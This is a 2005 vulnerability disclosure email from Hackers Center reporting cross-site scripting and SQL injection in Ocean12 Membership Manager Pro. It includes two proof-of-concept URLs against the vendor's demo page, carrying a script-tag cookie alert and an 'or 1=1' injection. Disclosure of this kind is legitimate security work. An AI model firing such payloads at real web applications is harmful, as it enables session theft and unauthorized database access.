From: Zinho <zinho(at)hackerscenter.com>
To: zone-h <admin(at)zone-h.org>, Zinho <zinho(at)hackerscenter.com>, asd <vuln(at)secunia.com>, 
    securitytracker <bugs(at)securitytracker.com>, securityfocus <bugtraq(at)securityfocus.com>, 
    security curmudgeon <jericho(at)attrition.org>, SecuriTeam News <news(at)securiteam.com>, 
    packetstorm1 <submissions(at)packetstormsecurity.org>, k-otik2 <Vuln(at)k-otik.com>, 
    k-otik1 <Exploits(at)k-otik.com>, "class101(at)HAT-SQUAD.com" <class101(at)hat-squad.com>
Date: Wed, 06 Apr 2005 19:50:59 +0200
Subject: [HSC Security Group] Ocean12 Membership Manager Pro : XSS and Sql injection


Hackers Center Security Group (http://www.hackerscenter.com/)     
Zinho's Security Advisory      


Title: Ocean12 Membership Manager Pro : XSS and Sql injection
Risk: High   
Date: 5/04/2005     
Vendor: http://www.ocean12scripts.com
"A membership manager application designed to allow a website owner 
to easily add password protected areas to their website"


xss

http://www.ocean12scripts.com/products/membership/demo/main.asp?
UserID=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/s
cript%3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10

SQL INJECTION
http://www.ocean12scripts.com/products/membership/demo/main.asp?
UserID=0 or 
1=1&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%
3E%3Cfont%20color=%22&Sort=Name&DisplayNumber=10


The vendor has been contacted more than a month ago. No response 
received.


Author:      
Zinho is webmaster and founder of http://www.hackerscenter.com ,   
Security research   portal    
Secure Web Hosting Companies Reviewed:   
http://www.securityforge.com/web-hosting/secure-web-hosting.asp   

zinho-no-spam (at) hackerscenter.com     


====>
Webmaster of
.:[ Hackers Center : Internet Security Portal]:.
http://www.hackerscenter.com
http://www.securityforge.com/web-hosting